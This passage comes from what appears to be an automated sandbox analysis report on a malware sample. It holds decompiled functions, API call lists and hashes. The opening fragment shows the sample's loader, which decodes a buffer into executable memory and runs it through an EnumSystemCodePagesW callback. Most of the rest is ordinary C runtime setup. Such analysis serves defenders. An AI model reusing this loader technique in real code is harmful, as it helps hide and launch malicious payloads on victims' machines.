                                                        					// The decoded RWX buffer is handed over as the enumeration callback, so the API call transfers control to it
                                                        					EnumSystemCodePagesW(_t19, 0); // executed
                                                        				}
                                                        				return 0;
                                                        			}

                                                        APIs
                                                        • _malloc.LIBCMT ref: 013B100E
                                                          • Part of subcall function 013B1147: __FF_MSGBANNER.LIBCMT ref: 013B115E
                                                          • Part of subcall function 013B1147: __NMSG_WRITE.LIBCMT ref: 013B1165
                                                          • Part of subcall function 013B1147: RtlAllocateHeap.NTDLL(00800000,00000000,00000001,00000000,00000000,00000000,?,013B48C7,00000000,00000000,00000000,00000000,?,013B44F9,00000018,013C2280), ref: 013B118A
                                                          • Part of subcall function 013B11D9: __wfsopen.LIBCMT ref: 013B11E4
                                                        • VirtualAlloc.KERNELBASE(00000000,00001487,00003000,00000040), ref: 013B1036
                                                        • __fread_nolock.LIBCMT ref: 013B1048
                                                        • _memset.LIBCMT ref: 013B1062
                                                        • EnumSystemCodePagesW.KERNELBASE(00000000,00000000), ref: 013B107E
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: AllocAllocateCodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
                                                        • String ID:
                                                        • API String ID: 3693343133-0
                                                        • Opcode ID: e970ffc898febc9680fec2f7fe5dc0a3a1cd131c7bfdfc0643763fde97308cae
                                                        • Instruction ID: d33b299ec09634e5aaa5e3fabe5523ab3d0286d94cd664b55446cccf0118649c
                                                        • Opcode Fuzzy Hash: e970ffc898febc9680fec2f7fe5dc0a3a1cd131c7bfdfc0643763fde97308cae
                                                        • Instruction Fuzzy Hash: 370126726043447BF7212A7AAC9BFDF3F5CDB51B5CF100865FB02AA581F9A498019274
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        C-Code - Quality: 89%
                                                        			E013B1498(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                        				intOrPtr _t16;
                                                        				intOrPtr _t19;
                                                        				intOrPtr _t29;
                                                        				intOrPtr _t31;
                                                        				void* _t32;
                                                        
                                                        				_push(0xc);
                                                        				_push(0x13c2170);
                                                        				E013B2400(__ebx, __edi, __esi);
                                                        				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
                                                        				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
                                                        					L6:
                                                        					_t16 = 0;
                                                        				} else {
                                                        					_t31 =  *((intOrPtr*)(_t32 + 0x18));
                                                        					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
                                                        						E013B1F5E(_t31); // __lock_file, see API ID below
                                                        						 *((intOrPtr*)(_t32 - 4)) = 0;
                                                        						_t19 = E013B12B8( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
                                                        						_t29 = _t19;
                                                        						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
                                                        						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
                                                        						E013B1521(_t31);
                                                        						_t16 = _t29;
                                                        					} else {
                                                        						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
                                                        							E013B1530( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc))); // _memset
                                                        						}
                                                        						 *((intOrPtr*)(E013B1CC3())) = 0x16; // errno = 0x16 (EINVAL)
                                                        						E013B1E89();
                                                        						goto L6;
                                                        					}
                                                        				}
                                                        				return E013B2445(_t16);
                                                        			}

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: __lock_file_memset
                                                        • String ID:
                                                        • API String ID: 26237723-0
                                                        • Opcode ID: 6f8065497089b3ada01df9150b9e27fbdab7ef0b7031397e28f6f65260da8c35
                                                        • Instruction ID: 5205364ee4fcf7023bf3186f6ae3dd705cb9b0401d3d017c318f8eeaab77d866
                                                        • Opcode Fuzzy Hash: 6f8065497089b3ada01df9150b9e27fbdab7ef0b7031397e28f6f65260da8c35
                                                        • Instruction Fuzzy Hash: 7C01887180020AEBCF21AFADBC504DF7F71AF90728F144215EB1866950F7758A11DF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        C-Code - Quality: 25%
                                                        			E013B11D9(intOrPtr _a4, intOrPtr _a8) {
                                                        				void* __ebp;
                                                        				void* _t3;
                                                        				void* _t4;
                                                        				void* _t5;
                                                        				void* _t6;
                                                        				void* _t9;
                                                        
                                                        				_push(0x40);
                                                        				_push(_a8);
                                                        				_push(_a4);
                                                        				_t3 = E013B11EE(_t4, _t5, _t6, _t9); // executed
                                                        				return _t3;
                                                        			}

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: __wfsopen
                                                        • String ID:
                                                        • API String ID: 197181222-0
                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction ID: 08ed1a97a1e799ba619fac02dc7a86af1dcdbc11624d2e39632d5bd9d2188f94
                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction Fuzzy Hash: 62B0927254120C77CE112AC6EC02A893B199B50664F008020FB0C18960A673A6609689
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E013B43CC(struct _EXCEPTION_POINTERS* _a4) {
                                                        
                                                        				SetUnhandledExceptionFilter(0);
                                                        				return UnhandledExceptionFilter(_a4);
                                                        			}

                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 013B43D1
                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 013B43DA
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 5b9c0a738ab1ab09926d7a426fad7f59261a5e3933b82d899e635a646c12db66
                                                        • Instruction ID: afafde0d2f0fd561e882fa020043f61e94ddf7aeeeb6fe85f92d4f215447bba8
                                                        • Opcode Fuzzy Hash: 5b9c0a738ab1ab09926d7a426fad7f59261a5e3933b82d899e635a646c12db66
                                                        • Instruction Fuzzy Hash: 14B09235044208ABCB102B9AE88DBC83F2CEB14753F100420F70E44056EB6254108B92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E013B439B(_Unknown_base(*)()* _a4) {
                                                        
                                                        				return SetUnhandledExceptionFilter(_a4);
                                                        			}

                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 013B43A1
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: eb0735900ec16b4948008573bf810dea2ff35a60c0ee1d6dcb987e3655a38303
                                                        • Instruction ID: fad76ee31edde4b45b1951a771a8243df1107a2e695a3c4ca93def39566f9de9
                                                        • Opcode Fuzzy Hash: eb0735900ec16b4948008573bf810dea2ff35a60c0ee1d6dcb987e3655a38303
                                                        • Instruction Fuzzy Hash: E5A0113000020CABCA002A8AE8888C83F2CEA002A2B000020FA0C00022EB22A8208A82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			// CRT heap initialisation (same shape as MSVCRT _heap_init): caches the process heap
                                                        			// handle in a global and returns 1 on success, 0 if GetProcessHeap returned NULL.
                                                        			E013B1D17() {
                                                        				void* _t3;
                                                        
                                                        				_t3 = GetProcessHeap();
                                                        				 *0x13c4834 = _t3; // global heap handle used by the CRT allocator (_crtheap)
                                                        				return 0 | _t3 != 0x00000000;
                                                        			}
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(013B1629,013C2190,00000014), ref: 013B1D17
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: HeapProcess
                                                        • String ID:
                                                        • API String ID: 54951025-0
                                                        • Opcode ID: ea194f36308a7be998ed5b581dbee86df8bc5e8fe528f464d675619cec3bfe07
                                                        • Instruction ID: 50578eead6f183e300877bff4ac25a44c0b053f9ed5ba20402d0964281b76953
                                                        • Opcode Fuzzy Hash: ea194f36308a7be998ed5b581dbee86df8bc5e8fe528f464d675619cec3bfe07
                                                        • Instruction Fuzzy Hash: FAB012B03032024BC7180B3D75A414A39DC6708301704003D7107C1188FF20C410DB01
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983374301.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_110000_yldnat.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4bee78ce192f1e0359bd16443b34b42dcf04ebaf259c185fd8bd1d79e4b24057
                                                        • Instruction ID: 1d8a7687d2d980c93af267717f2eade03ba97f4240c287792347ea03cabc4e46
                                                        • Opcode Fuzzy Hash: 4bee78ce192f1e0359bd16443b34b42dcf04ebaf259c185fd8bd1d79e4b24057
                                                        • Instruction Fuzzy Hash: 27F1015085D2E9ADDB06CBFD45643FCBFB05E26102F0845DAE0E5E6283C53A938EDB25
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 86%
                                                        			// Matches the MSVCRT _ioinit routine: builds the __pioinfo handle table (global 0x13c4848,
                                                        			// _nhandle at 0x13c50e4), inherits the handles the parent passed in STARTUPINFO.lpReserved2,
                                                        			// then attaches fds 0..2 to the process standard handles.
                                                        			E013B38A8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                        				signed int _t82;
                                                        				signed int _t86;
                                                        				long _t90;
                                                        				void* _t91;
                                                        				signed int _t94;
                                                        				signed int _t98;
                                                        				signed int _t99;
                                                        				signed char _t103;
                                                        				signed int _t105;
                                                        				intOrPtr _t106;
                                                        				intOrPtr* _t109;
                                                        				signed char _t111;
                                                        				long _t119;
                                                        				intOrPtr _t129;
                                                        				signed int _t133;
                                                        				void* _t135;
                                                        				signed int _t138;
                                                        				void** _t139;
                                                        				signed int _t141;
                                                        				signed int _t142;
                                                        				signed int _t143;
                                                        				signed int _t147;
                                                        				signed int _t149;
                                                        				void* _t150;
                                                        				signed int _t154;
                                                        				void* _t155;
                                                        				void* _t156;
                                                        
                                                        				_push(0x64);
                                                        				_push(0x13c2260);
                                                        				E013B2400(__ebx, __edi, __esi); // SEH prolog: 0x64-byte frame, scope table at 0x13c2260
                                                        				E013B442F(0xb); // take CRT lock 0xb for the duration of the table setup
                                                        				 *((intOrPtr*)(_t155 - 4)) = 0; // __try level 0
                                                        				_push(0x40);
                                                        				_t141 = 0x20;
                                                        				_push(_t141);
                                                        				_t82 = E013B4869(); // calloc-style: 0x20 ioinfo entries of 0x40 bytes = 0x800 bytes
                                                        				_t133 = _t82;
                                                        				 *(_t155 - 0x24) = _t133;
                                                        				if(_t133 != 0) {
                                                        					 *0x13c4848 = _t82; // __pioinfo[0]
                                                        					 *0x13c50e4 = _t141; // _nhandle = 32
                                                        					while(1) {
                                                        						__eflags = _t133 - 0x800 + _t82;
                                                        						if(_t133 >= 0x800 + _t82) {
                                                        							break;
                                                        						}
                                                        						// initialise one ioinfo entry: osfhnd = INVALID_HANDLE_VALUE, osfile = 0, pipech = '\n',
                                                        						// lock not yet initialised, text-mode byte cleared, dbcs buffer empty
                                                        						 *((short*)(_t133 + 4)) = 0xa00;
                                                        						 *_t133 =  *_t133 | 0xffffffff;
                                                        						 *((intOrPtr*)(_t133 + 8)) = 0;
                                                        						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
                                                        						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
                                                        						 *((short*)(_t133 + 0x25)) = 0xa0a;
                                                        						 *((intOrPtr*)(_t133 + 0x38)) = 0;
                                                        						 *((char*)(_t133 + 0x34)) = 0;
                                                        						_t133 = _t133 + 0x40; // next entry
                                                        						 *(_t155 - 0x24) = _t133;
                                                        						_t82 =  *0x13c4848; // 0x82f258
                                                        					}
                                                        					GetStartupInfoW(_t155 - 0x74); // STARTUPINFOW lives at ebp-0x74
                                                        					__eflags =  *((short*)(_t155 - 0x42)); // si.cbReserved2: non-zero means the parent passed inherited handles
                                                        					if( *((short*)(_t155 - 0x42)) == 0) {
                                                        						L27:
                                                        						_t129 = 0xfffffffe; // _NO_CONSOLE_FILENO (-2)
                                                        						L28:
                                                        						_t142 = 0; // fd index 0..2: wire stdin/stdout/stderr to the process std handles
                                                        						__eflags = 0;
                                                        						while(1) {
                                                        							 *(_t155 - 0x2c) = _t142;
                                                        							__eflags = _t142 - 3;
                                                        							if(_t142 >= 3) {
                                                        								break;
                                                        							}
                                                        							_t147 = (_t142 << 6) +  *0x13c4848; // ioinfo entry for fd _t142 (0x40 bytes each)
                                                        							 *(_t155 - 0x24) = _t147;
                                                        							__eflags =  *_t147 - 0xffffffff;
                                                        							if( *_t147 == 0xffffffff) { // osfhnd still INVALID_HANDLE_VALUE: nothing inherited for this fd
                                                        								L33:
                                                        								 *(_t147 + 4) = 0x81; // osfile = FOPEN | FTEXT
                                                        								__eflags = _t142;
                                                        								if(_t142 != 0) {
                                                        									_t65 = _t142 - 1; // -1
                                                        									asm("sbb eax, eax");
                                                        									_t90 =  ~_t65 + 0xfffffff5; // -11 / -12: STD_OUTPUT_HANDLE / STD_ERROR_HANDLE
                                                        									__eflags = _t90;
                                                        								} else {
                                                        									_t90 = 0xfffffff6; // -10: STD_INPUT_HANDLE
                                                        								}
                                                        								_t91 = GetStdHandle(_t90);
                                                        								 *(_t155 - 0x1c) = _t91;
                                                        								__eflags = _t91 - 0xffffffff;
                                                        								if(_t91 == 0xffffffff) {
                                                        									L45:
                                                        									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040; // no usable std handle: mark FDEV
                                                        									 *_t147 = _t129; // osfhnd = _NO_CONSOLE_FILENO
                                                        									_t94 =  *0x13c6100; // __piob (FILE* table), if already allocated
                                                        									__eflags = _t94;
                                                        									if(_t94 != 0) {
                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129; // __piob[fd]->_file = -2
                                                        									}
                                                        									goto L47;
                                                        								} else {
                                                        									__eflags = _t91;
                                                        									if(_t91 == 0) {
                                                        										goto L45;
                                                        									}
                                                        									_t98 = GetFileType(_t91);
                                                        									__eflags = _t98;
                                                        									if(_t98 == 0) {
                                                        										goto L45;
                                                        									}
                                                        									 *_t147 =  *(_t155 - 0x1c); // osfhnd = the std handle
                                                        									_t99 = _t98 & 0x000000ff;
                                                        									__eflags = _t99 - 2;
                                                        									if(_t99 != 2) { // FILE_TYPE_CHAR?
                                                        										__eflags = _t99 - 3;
                                                        										if(_t99 != 3) { // FILE_TYPE_PIPE?
                                                        											L44:
                                                        											_t71 = _t147 + 0xc; // -20727868
                                                        											E013B40A2(_t71, 0xfa0, 0); // initialise the entry's critical section, spin count 4000
                                                        											_t156 = _t156 + 0xc;
                                                        											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1; // lockinitflag
                                                        											L47:
                                                        											_t142 = _t142 + 1;
                                                        											continue;
                                                        										}
                                                        										_t103 =  *(_t147 + 4) | 0x00000008; // FPIPE
                                                        										__eflags = _t103;
                                                        										L43:
                                                        										 *(_t147 + 4) = _t103;
                                                        										goto L44;
                                                        									}
                                                        									_t103 =  *(_t147 + 4) | 0x00000040; // FDEV
                                                        									goto L43;
                                                        									goto L43;
                                                        								}
                                                        							}
                                                        							__eflags =  *_t147 - _t129;
                                                        							if( *_t147 == _t129) { // osfhnd == _NO_CONSOLE_FILENO: still needs a std handle
                                                        								goto L33;
                                                        							}
                                                        							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080; // inherited handle: force FTEXT
                                                        							goto L47;
                                                        						}
                                                        						 *((intOrPtr*)(_t155 - 4)) = _t129; // leave __try (trylevel = -2)
                                                        						E013B3B53(); // __finally: release lock 0xb
                                                        						_t86 = 0; // success
                                                        						__eflags = 0;
                                                        						L49:
                                                        						return E013B2445(_t86); // SEH epilog
                                                        					}
                                                        					_t105 =  *(_t155 - 0x40); // si.lpReserved2: [count][count osfile bytes][count HANDLEs]
                                                        					__eflags = _t105;
                                                        					if(_t105 == 0) {
                                                        						goto L27;
                                                        					}
                                                        					_t135 =  *_t105; // number of inherited handles
                                                        					 *(_t155 - 0x1c) = _t135;
                                                        					_t106 = _t105 + 4; // osfile flag bytes
                                                        					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                                                        					 *(_t155 - 0x20) = _t106 + _t135; // HANDLE array follows the flag bytes
                                                        					__eflags = _t135 - 0x800;
                                                        					if(_t135 >= 0x800) { // cap at 2048 = 64 blocks x 32 entries
                                                        						_t135 = 0x800;
                                                        						 *(_t155 - 0x1c) = 0x800;
                                                        					}
                                                        					_t149 = 1; // index of the next __pioinfo block to allocate
                                                        					__eflags = 1;
                                                        					 *(_t155 - 0x30) = 1;
                                                        					while(1) {
                                                        						__eflags =  *0x13c50e4 - _t135; // 0x20   grow __pioinfo until _nhandle covers the inherited count
                                                        						if(__eflags >= 0) {
                                                        							break;
                                                        						}
                                                        						_t138 = E013B4869(_t141, 0x40); // calloc another block of 32 entries
                                                        						 *(_t155 - 0x24) = _t138;
                                                        						__eflags = _t138;
                                                        						if(_t138 != 0) {
                                                        							0x13c4848[_t149] = _t138; // __pioinfo[_t149]
                                                        							 *0x13c50e4 =  *0x13c50e4 + _t141; // _nhandle += 32
                                                        							__eflags =  *0x13c50e4;
                                                        							while(1) {
                                                        								__eflags = _t138 - 0x800 + 0x13c4848[_t149];
                                                        								if(_t138 >= 0x800 + 0x13c4848[_t149]) {
                                                        									break;
                                                        								}
                                                        								 *((short*)(_t138 + 4)) = 0xa00;
                                                        								 *_t138 =  *_t138 | 0xffffffff;
                                                        								 *((intOrPtr*)(_t138 + 8)) = 0;
                                                        								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
                                                        								 *((short*)(_t138 + 0x25)) = 0xa0a;
                                                        								 *((intOrPtr*)(_t138 + 0x38)) = 0;
                                                        								 *((char*)(_t138 + 0x34)) = 0;
                                                        								_t138 = _t138 + 0x40;
                                                        								 *(_t155 - 0x24) = _t138;
                                                        							}
                                                        							_t149 = _t149 + 1;
                                                        							 *(_t155 - 0x30) = _t149;
                                                        							_t135 =  *(_t155 - 0x1c);
                                                        							continue;
                                                        						}
                                                        						_t135 =  *0x13c50e4; // 0x20   allocation failed: inherit only as many handles as the table holds
                                                        						 *(_t155 - 0x1c) = _t135;
                                                        						break;
                                                        					}
                                                        					_t143 = 0; // walk the inherited handles, fd = _t143
                                                        					 *(_t155 - 0x2c) = 0;
                                                        					_t129 = 0xfffffffe; // _NO_CONSOLE_FILENO (-2)
                                                        					_t109 =  *((intOrPtr*)(_t155 - 0x28)); // current osfile byte
                                                        					_t139 =  *(_t155 - 0x20); // current HANDLE
                                                        					while(1) {
                                                        						__eflags = _t143 - _t135;
                                                        						if(_t143 >= _t135) {
                                                        							goto L28;
                                                        						}
                                                        						_t150 =  *_t139;
                                                        						__eflags = _t150 - 0xffffffff;
                                                        						if(_t150 == 0xffffffff) {
                                                        							L22:
                                                        							_t143 = _t143 + 1;
                                                        							 *(_t155 - 0x2c) = _t143;
                                                        							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                                                        							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                                                        							_t139 =  &(_t139[1]);
                                                        							 *(_t155 - 0x20) = _t139;
                                                        							continue;
                                                        						}
                                                        						__eflags = _t150 - _t129;
                                                        						if(_t150 == _t129) {
                                                        							goto L22;
                                                        						}
                                                        						_t111 =  *_t109; // inherited osfile byte
                                                        						__eflags = _t111 & 0x00000001;
                                                        						if((_t111 & 0x00000001) == 0) { // not FOPEN: skip
                                                        							goto L22;
                                                        						}
                                                        						__eflags = _t111 & 0x00000008;
                                                        						if((_t111 & 0x00000008) != 0) { // FPIPE: taken without validating the handle
                                                        							L20:
                                                        							_t154 = ((_t143 & 0x0000001f) << 6) + 0x13c4848[_t143 >> 5]; // __pioinfo[fd >> 5][fd & 31]
                                                        							 *(_t155 - 0x24) = _t154;
                                                        							 *_t154 =  *_t139; // osfhnd = inherited HANDLE
                                                        							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28)))); // osfile = inherited flags
                                                        							_t37 = _t154 + 0xc; // 0xd
                                                        							E013B40A2(_t37, 0xfa0, 0); // initialise the entry's critical section, spin count 4000
                                                        							_t156 = _t156 + 0xc;
                                                        							_t38 = _t154 + 8;
                                                        							 *_t38 =  *(_t154 + 8) + 1; // lockinitflag
                                                        							__eflags =  *_t38;
                                                        							_t139 =  *(_t155 - 0x20);
                                                        							L21:
                                                        							_t135 =  *(_t155 - 0x1c);
                                                        							goto L22;
                                                        						}
                                                        						_t119 = GetFileType(_t150); // non-pipe handle: keep it only if the OS recognises its type
                                                        						_t139 =  *(_t155 - 0x20);
                                                        						__eflags = _t119;
                                                        						if(_t119 == 0) { // FILE_TYPE_UNKNOWN: skip
                                                        							goto L21;
                                                        						}
                                                        						goto L20;
                                                        					}
                                                        					goto L28;
                                                        				}
                                                        				_t86 = E013B2600(_t155, 0x13c3400, _t155 - 0x10, 0xfffffffe) | 0xffffffff; // first block allocation failed: return -1
                                                        				goto L49;
                                                        			}
                                                        0x00000000
                                                        0x013b3adc
                                                        0x013b3ae2
                                                        0x013b3ae4
                                                        0x00000000
                                                        0x00000000
                                                        0x013b3ae9
                                                        0x013b3aeb
                                                        0x013b3af0
                                                        0x013b3af3
                                                        0x013b3afd
                                                        0x013b3b00
                                                        0x013b3b0b
                                                        0x013b3b12
                                                        0x013b3b16
                                                        0x013b3b1b
                                                        0x013b3b1e
                                                        0x013b3b3d
                                                        0x013b3b3d
                                                        0x00000000
                                                        0x013b3b3d
                                                        0x013b3b06
                                                        0x013b3b06
                                                        0x013b3b08
                                                        0x013b3b08
                                                        0x00000000
                                                        0x013b3b08
                                                        0x013b3af9
                                                        0x00000000
                                                        0x013b3af9
                                                        0x013b3ad5
                                                        0x013b3a9f
                                                        0x013b3aa1
                                                        0x00000000
                                                        0x00000000
                                                        0x013b3aa9
                                                        0x00000000
                                                        0x013b3aa9
                                                        0x013b3b43
                                                        0x013b3b46
                                                        0x013b3b4b
                                                        0x013b3b4b
                                                        0x013b3b4d
                                                        0x013b3b52
                                                        0x013b3b52
                                                        0x013b394c
                                                        0x013b394f
                                                        0x013b3951
                                                        0x00000000
                                                        0x00000000
                                                        0x013b3957
                                                        0x013b3959
                                                        0x013b395c
                                                        0x013b395f
                                                        0x013b3964
                                                        0x013b396c
                                                        0x013b396e
                                                        0x013b3970
                                                        0x013b3972
                                                        0x013b3972
                                                        0x013b3977
                                                        0x013b3977
                                                        0x013b3978
                                                        0x013b397b
                                                        0x013b397b
                                                        0x013b3981
                                                        0x00000000
                                                        0x00000000
                                                        0x013b398d
                                                        0x013b398f
                                                        0x013b3992
                                                        0x013b3994
                                                        0x013b3a2e
                                                        0x013b3a35
                                                        0x013b3a35
                                                        0x013b3a3b
                                                        0x013b3a47
                                                        0x013b3a49
                                                        0x00000000
                                                        0x00000000
                                                        0x013b3a4b
                                                        0x013b3a51
                                                        0x013b3a54
                                                        0x013b3a57
                                                        0x013b3a5b
                                                        0x013b3a61
                                                        0x013b3a64
                                                        0x013b3a67
                                                        0x013b3a6a
                                                        0x013b3a6a
                                                        0x013b3a6f
                                                        0x013b3a70
                                                        0x013b3a73
                                                        0x00000000
                                                        0x013b3a73
                                                        0x013b399a
                                                        0x013b39a0
                                                        0x00000000
                                                        0x013b39a0
                                                        0x013b39a3
                                                        0x013b39a5
                                                        0x013b39aa
                                                        0x013b39ab
                                                        0x013b39ae
                                                        0x013b39b1
                                                        0x013b39b1
                                                        0x013b39b3
                                                        0x00000000
                                                        0x00000000
                                                        0x013b39b9
                                                        0x013b39bb
                                                        0x013b39be
                                                        0x013b3a1b
                                                        0x013b3a1b
                                                        0x013b3a1c
                                                        0x013b3a22
                                                        0x013b3a23
                                                        0x013b3a26
                                                        0x013b3a29
                                                        0x00000000
                                                        0x013b3a29
                                                        0x013b39c0
                                                        0x013b39c2
                                                        0x00000000
                                                        0x00000000
                                                        0x013b39c4
                                                        0x013b39c6
                                                        0x013b39c8
                                                        0x00000000
                                                        0x00000000
                                                        0x013b39ca
                                                        0x013b39cc
                                                        0x013b39dc
                                                        0x013b39e9
                                                        0x013b39f0
                                                        0x013b39f5
                                                        0x013b39fc
                                                        0x013b3a06
                                                        0x013b3a0a
                                                        0x013b3a0f
                                                        0x013b3a12
                                                        0x013b3a12
                                                        0x013b3a12
                                                        0x013b3a15
                                                        0x013b3a18
                                                        0x013b3a18
                                                        0x00000000
                                                        0x013b3a18
                                                        0x013b39cf
                                                        0x013b39d5
                                                        0x013b39d8
                                                        0x013b39da
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x013b39da
                                                        0x00000000
                                                        0x013b39b1
                                                        0x013b38ea
                                                        0x00000000

                                                        APIs
                                                        • __lock.LIBCMT ref: 013B38B6
                                                          • Part of subcall function 013B442F: __mtinitlocknum.LIBCMT ref: 013B4441
                                                          • Part of subcall function 013B442F: EnterCriticalSection.KERNEL32(00000000,?,013B37AB,0000000D), ref: 013B445A
                                                        • __calloc_crt.LIBCMT ref: 013B38C7
                                                          • Part of subcall function 013B4869: __calloc_impl.LIBCMT ref: 013B4878
